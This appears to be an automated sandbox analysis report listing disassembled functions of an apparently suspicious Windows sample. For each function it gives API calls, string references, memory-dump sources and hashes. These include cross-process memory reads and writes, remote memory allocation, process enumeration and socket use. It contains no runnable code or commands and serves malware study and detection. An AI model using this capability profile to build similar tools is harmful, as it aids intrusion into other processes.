Part of subcall function 005C2D58: RtlFreeHeap.NTDLL(00000000,00000000,?,005CDB71,00661DC4,00000000,00661DC4,00000000,?,005CDB98,00661DC4,00000007,00661DC4,?,005CDF95,00661DC4), ref: 005C2D6E
Part of subcall function 005C2D58: GetLastError.KERNEL32(00661DC4,?,005CDB71,00661DC4,00000000,00661DC4,00000000,?,005CDB98,00661DC4,00000007,00661DC4,?,005CDF95,00661DC4,00661DC4), ref: 005C2D80

_free.LIBCMT ref: 005C2660
_free.LIBCMT ref: 005C2673
_free.LIBCMT ref: 005C2684
_free.LIBCMT ref: 005C2695

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3aeb65603b000928928fbbf3933bb523c189a65d04b9b9d33b6733462d91f5c0
Instruction ID: 8885e2a38d1515d07f1ba4fd5b5288257bb80e3763d7a18b073b49d5ecdc1d17
Opcode Fuzzy Hash: 3aeb65603b000928928fbbf3933bb523c189a65d04b9b9d33b6733462d91f5c0
Instruction Fuzzy Hash: 04F030B04416529F8711AFA4AC15D493FAAFB65751B05221EF415D72B4CBB00AC3AF94

Uniqueness

Uniqueness Score: -1.00%

Function 00616B2D Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON

Download Yara Rule

APIs

Part of subcall function 005B05D2: EnterCriticalSection.KERNEL32(0066170C,?,00000000,?,0059D1DA,00663540,00000001,00000000,?,?,0060EF39,?,?,00000000,00000001,?), ref: 005B05DD
Part of subcall function 005B05D2: LeaveCriticalSection.KERNEL32(0066170C,?,0059D1DA,00663540,00000001,00000000,?,?,0060EF39,?,?,00000000,00000001,?,00000001,00662430), ref: 005B061A

Part of subcall function 005B0433: __onexit.LIBCMT ref: 005B0439

__Init_thread_footer.LIBCMT ref: 00616B95

Part of subcall function 005B0588: EnterCriticalSection.KERNEL32(0066170C,00000000,?,0059D208,00663540,005D27E9,00000001,00000000,?,?,0060EF39,?,?,00000000,00000001,?), ref: 005B0592
Part of subcall function 005B0588: LeaveCriticalSection.KERNEL32(0066170C,?,0059D208,00663540,005D27E9,00000001,00000000,?,?,0060EF39,?,?,00000000,00000001,?,00000001), ref: 005B05C5

Part of subcall function 00603EF6: LoadStringW.USER32(00000066,?,00000FFF,0062DCEC), ref: 00603F3E
Part of subcall function 00603EF6: LoadStringW.USER32(?,?,00000FFF,?), ref: 00603F64

Strings

x3f, xrefs: 00616C97
x3f, xrefs: 00616CB0
x3f, xrefs: 00616CCC

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
String ID: x3f$x3f$x3f
API String ID: 1072379062-2431936157
Opcode ID: 607fc2182a303a98fed1f9c5275f1b848831fa3945b33a36a6dc33357cec00c6
Instruction ID: cb6757a4e95b44a8e66a1ecfcb5f77e38450339392f27e295a2caec017fa46be
Opcode Fuzzy Hash: 607fc2182a303a98fed1f9c5275f1b848831fa3945b33a36a6dc33357cec00c6
Instruction Fuzzy Hash: B4C16D79A0410AAFDB14DF58C895DFEB7BAFF49300F148129F9059B291DB70AD85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0059CF30 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0059D203

Strings

D5f, xrefs: 0059CF7F
D5f, xrefs: 0059D1EA
D5f, xrefs: 0059CF78

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Init_thread_footer
String ID: D5f$D5f$D5f
API String ID: 1385522511-2099992648
Opcode ID: 9b88bd0de1f118173a43e33739d2a99cf0bca4820060f342a6dffd898b5550b2
Instruction ID: 813514c48f1bc523c7f56eb0d75e57b73af6f261ffd26c48cd254ed85a3fe490
Opcode Fuzzy Hash: 9b88bd0de1f118173a43e33739d2a99cf0bca4820060f342a6dffd898b5550b2
Instruction Fuzzy Hash: 52913B75A00216CFCF18CF59C4906AABFF2FF58310F24456AD946A7351E731EA81DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 005F2FA6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005FBCDF: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005F2A60,?,?,00000034,00000800,?,00000034), ref: 005FBD09

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 005F2FF0

Part of subcall function 005FBCAA: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005F2A8F,?,?,00000800,?,00001073,00000000,?,?), ref: 005FBCD4

Part of subcall function 005FBC06: GetWindowThreadProcessId.USER32(?,?), ref: 005FBC31
Part of subcall function 005FBC06: OpenProcess.KERNEL32(00000438,00000000,?,?,?,005F2A24,00000034,?,?,00001004,00000000,00000000), ref: 005FBC41
Part of subcall function 005FBC06: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,005F2A24,00000034,?,?,00001004,00000000,00000000), ref: 005FBC57

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005F305D
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005F30AA

Strings

@, xrefs: 005F30C2

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 5b4ac8f005391712a03a78bf44cfa2718860596f68cc636a01499fa81298b6fc
Instruction ID: 8b4ed7a7718d24501e2efef99f9a14f591283e4309c94dade9b52405912f75fa
Opcode Fuzzy Hash: 5b4ac8f005391712a03a78bf44cfa2718860596f68cc636a01499fa81298b6fc
Instruction Fuzzy Hash: A9413C7690021DAFDB10DFA4CD86AEEBBB8FB49700F004095FA55B7180DA756E85CB60

Uniqueness

Uniqueness Score: -1.00%

Function 005FCA3D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 005FCAC6
DeleteMenu.USER32(?,00000007,00000000), ref: 005FCB0C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00662990,016D59D8), ref: 005FCB55

Strings

0, xrefs: 005FCA9F

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: f3661a204858896ca0e9eb16aa1ec877053ffb4e26dbdecbdd4d6a036be8fa87
Instruction ID: 69b6f5b36ce978e6cddf04147720a33553cdb9416f1aeb328a1ccc729748d811
Opcode Fuzzy Hash: f3661a204858896ca0e9eb16aa1ec877053ffb4e26dbdecbdd4d6a036be8fa87
Instruction Fuzzy Hash: 2F41C23410534A9FD720DF28C94AF2ABFE4BF84320F04452DFAA1972D1D774A805CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00624D75 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0062DCD0,00000000,?,?,?,?), ref: 00624E09
GetWindowLongW.USER32 ref: 00624E26
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00624E36

Strings

SysTreeView32, xrefs: 00624DDB

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: dee6117da2e8fcbf4bb6b5bcf2026585381171f84bc4138a4462f8e83a8da614
Instruction ID: 5ba468e9845052c117c6104df29500fe62873c02dd48478bd1b2299723ed9006
Opcode Fuzzy Hash: dee6117da2e8fcbf4bb6b5bcf2026585381171f84bc4138a4462f8e83a8da614
Instruction Fuzzy Hash: 10318E31100A16AFEF219E38DC45BEA7BAAFF48334F214715F975932E0DB70A8518B50

Uniqueness

Uniqueness Score: -1.00%

Function 00624817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0062489F
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 006248B3
SendMessageW.USER32(?,00001002,00000000,?), ref: 006248D7

Strings

SysMonthCal32, xrefs: 0062486A

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: aa4b9ff4284aef5ececcd3e6d24d35521fafe965476a0270d35a14d2b31b5ee4
Instruction ID: c03dc20d96129ccfaaf187accc47d30220d4c552d4b50368974648cccc745f04
Opcode Fuzzy Hash: aa4b9ff4284aef5ececcd3e6d24d35521fafe965476a0270d35a14d2b31b5ee4
Instruction Fuzzy Hash: 3121D132610629AFDF218F90DC46FEA3BBAEF88714F110114FA15AB1D0DAB5E8558B90

Uniqueness

Uniqueness Score: -1.00%

Function 00624FB2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00625064
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00625072
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00625079

Strings

msctls_updown32, xrefs: 00624FE3

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 08aa71e514924658fe75337ac4f574aa9a25ff7a0fd0620260d9837f61301748
Instruction ID: 5ad2d835b4bb61516eea1245fa244a563112fd06b169290270f8ce0c27ab6b98
Opcode Fuzzy Hash: 08aa71e514924658fe75337ac4f574aa9a25ff7a0fd0620260d9837f61301748
Instruction Fuzzy Hash: C52192B5600A19AFDB21DF14DC85DBB37AEEF9A3A4B000559F9019B361CB71EC518F60

Uniqueness

Uniqueness Score: -1.00%

Function 00624116 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0062419F
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 006241AF
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 006241D5

Strings

Listbox, xrefs: 0062416E

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 02d2e66c9829cdfaaab5892a5b14978643b2c2ea9fe03fdc725bfa05ab9c52cd
Instruction ID: 09c69e066344d12bb5693ca09da8d021db34fd4d6c950ae87b055f141dc000c6
Opcode Fuzzy Hash: 02d2e66c9829cdfaaab5892a5b14978643b2c2ea9fe03fdc725bfa05ab9c52cd
Instruction Fuzzy Hash: 0A21AA32610528BFDF118F54DC49EFB376FEF99794F118114F9149B290CA719CA28B90

Uniqueness

Uniqueness Score: -1.00%

Function 00624B4A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00624BAE
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00624BC3
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00624BD0

Strings

msctls_trackbar32, xrefs: 00624B85

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: ac5903c0c06ca04ec82536336ffc6f55d84b766dc8b844682cb8588ff8aa185c
Instruction ID: fcb087eda5ea1ea2bc942fcc8ff7ce1100334eb4591df49998dc0bd556ea124d
Opcode Fuzzy Hash: ac5903c0c06ca04ec82536336ffc6f55d84b766dc8b844682cb8588ff8aa185c
Instruction Fuzzy Hash: 6E113631240208BEEF205F64DC46FEB3BAAEF85B55F010518FA51E31A0DA71DC218B20

Uniqueness

Uniqueness Score: -1.00%

Function 006261E1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00626220
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 0062624D
DrawMenuBar.USER32(?), ref: 0062625C

Strings

0, xrefs: 006261EE

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: cd2be28cdbdfd2dfeda0ae96a55a4af39015f477326ae9cd660c51f87ce1b2ea
Instruction ID: 2c9a890f4b89422b58150acff833dbd1c4ea076487eb23013a8e070f69f27ac9
Opcode Fuzzy Hash: cd2be28cdbdfd2dfeda0ae96a55a4af39015f477326ae9cd660c51f87ce1b2ea
Instruction Fuzzy Hash: BE01C031501629EFDB209F54EC88BEA7FB6FF44310F148095F849E6150CB708A81EF21

Uniqueness

Uniqueness Score: -1.00%

Function 005F090F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c86c011ba851cb6ddf0614e2565f24c58fad1df80e8daadb3a7bad081ece46d
Instruction ID: 90ab4b72333d47a3790770f7f92785b822a3021cc2aabd6f6eb779d8ef751007
Opcode Fuzzy Hash: 5c86c011ba851cb6ddf0614e2565f24c58fad1df80e8daadb3a7bad081ece46d
Instruction Fuzzy Hash: CAC17D75A0021AEFDB14CF94C894ABEBBB5FF88304F149598E605DB292D735ED41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 005C4210 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 005C429B
__alldvrm.LIBCMT ref: 005C449C
__alldvrm.LIBCMT ref: 005C44BE

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
Instruction ID: 9b37de4ab070e13d9f111b3658ddaea8890b6a3ba3ef3f26228ff4b24cb5dc17
Opcode Fuzzy Hash: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
Instruction Fuzzy Hash: 2BA127759003869FEB25CF98C8A1FAEBFA5FF55310F28456EE9859B241C3349941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 005F0CC6 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00630BD4,?), ref: 005F0E80
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00630BD4,?), ref: 005F0E98
CLSIDFromProgID.OLE32(?,?,00000000,0062DCE0,000000FF,?,00000000,00000800,00000000,?,00630BD4,?), ref: 005F0EBD
_memcmp.LIBVCRUNTIME ref: 005F0EDE

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 033f1ff23e6191e0783bdb59fd64fc32fe506743564ef70e1a5840f60fb87a06
Instruction ID: c4c5217aa6dd5d85baa90647809c68ce470cc542bbf6126d44b7834b46709397
Opcode Fuzzy Hash: 033f1ff23e6191e0783bdb59fd64fc32fe506743564ef70e1a5840f60fb87a06
Instruction Fuzzy Hash: 7D813C75A00109EFCF00DF94C984EEEBBB9FF89315F244558E606AB251DB75AE06CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0061AFDB Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0061B00B
Process32FirstW.KERNEL32(00000000,?), ref: 0061B019

Part of subcall function 0059B25F: _wcslen.LIBCMT ref: 0059B269

Process32NextW.KERNEL32(00000000,?), ref: 0061B0FB
CloseHandle.KERNEL32(00000000), ref: 0061B10A

Part of subcall function 005AE2E5: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,005D4D4D,?), ref: 005AE30F

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: e52ffcd76d8f1bbeb3ae3589f5b2336bc29e27ad47c3ec367b1f24738afe5f98
Instruction ID: 6dc956b691e25bb97e241c1ce950ae3c99e590256ab1eb410bf4e0f28a0ba7eb
Opcode Fuzzy Hash: e52ffcd76d8f1bbeb3ae3589f5b2336bc29e27ad47c3ec367b1f24738afe5f98
Instruction Fuzzy Hash: 0F516971508301AFD710EF24D88AAABBBE9FFC9754F04491DF98597261EB70D904CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00612433 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 0061245A
WSAGetLastError.WSOCK32 ref: 00612468
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 006124E7
WSAGetLastError.WSOCK32 ref: 006124F1

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 21aa44e8d4600999bfc5b0b0563fb5e5bdc4d8c68ec45e7bf2de1b7ff902ded1
Instruction ID: 0014e9cc5f5c1621efbb09b90d4d40b6a0a62c8760e1a9d5b0523e3fda31f032
Opcode Fuzzy Hash: 21aa44e8d4600999bfc5b0b0563fb5e5bdc4d8c68ec45e7bf2de1b7ff902ded1
Instruction Fuzzy Hash: 4941D574640602AFEB209F24C8AAF693BE6AB45714F58C448F5199F3D2C671ED82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00626BD7 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00626C41
ScreenToClient.USER32(?,?), ref: 00626C74
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00626CE1

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
